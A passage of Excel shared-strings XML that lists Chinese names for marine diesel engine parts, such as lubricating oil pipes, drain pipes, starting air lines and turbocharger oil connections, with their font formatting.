        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>备用执行器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵侧顶层走台管系</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸润滑油管系</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮箱管系</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气集管泄放管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座排气侧泄放管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴滑油进口总管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>各泄放管支撑</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泄放总管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座泄放管支撑</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压、润滑油泄放</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>出口系统</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>各种泄放管支撑</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压油泵</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>到滑油冷却器的膜片阀出口</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>伞形密封泄放</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架管件清单</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>润滑油管出口</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调速器润滑</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>润滑油管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>润滑油泄放管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>注油器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀油进口</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>填料函支撑</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链轮箱放气管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖泄放管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸体主管装配</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泄放主管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气箱主管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖泄放管漏斗</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>涡轮增压器润滑油进口</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>涡轮增压器润滑油进口主管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>涡轮增压器润滑油出口</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>涡轮增压器滑油出口透气管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>节流接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>摇臂润滑</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>各种润滑油管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主液压管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>润滑油管补偿器安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油管补偿器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>减压阀支撑</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>蓄压块支撑</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泵单元液压油管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>蓄压块总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泵单元进口管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>补偿器压力管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泵单元润滑油管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气缸常压系统</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却器滑油进口管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却器滑油出口管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滤器滑油进口管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滤器滑油出口管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泵滑油进口管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泵滑油出口管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>换向机构</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调速器驱动滑油</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>手动泵布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>预润滑泵布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>应急吸入管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀杆润滑</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泵润滑油管出口</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封油润滑油管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>前端泵润滑</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泵滑油</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调压阀备件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带插座管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>过滤器润滑油出口</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油蒸气排出管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油分离器布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力润滑手动泵布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>发电机滑油管出口</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>离心过滤器布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封油管布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>启动空气管，阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动空气分支管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>启动空气支撑</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制和安全空气管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>启动空气管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>分配器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>涡轮增压器水清洗</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>涡轮增压器排放空气管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封油管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>通风分支管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制油主管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>爆破帽</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>启动空气分配管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>到涡轮增压器的压缩空气</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>保护装置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>慢转布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气侧主管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>淡水管进口</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
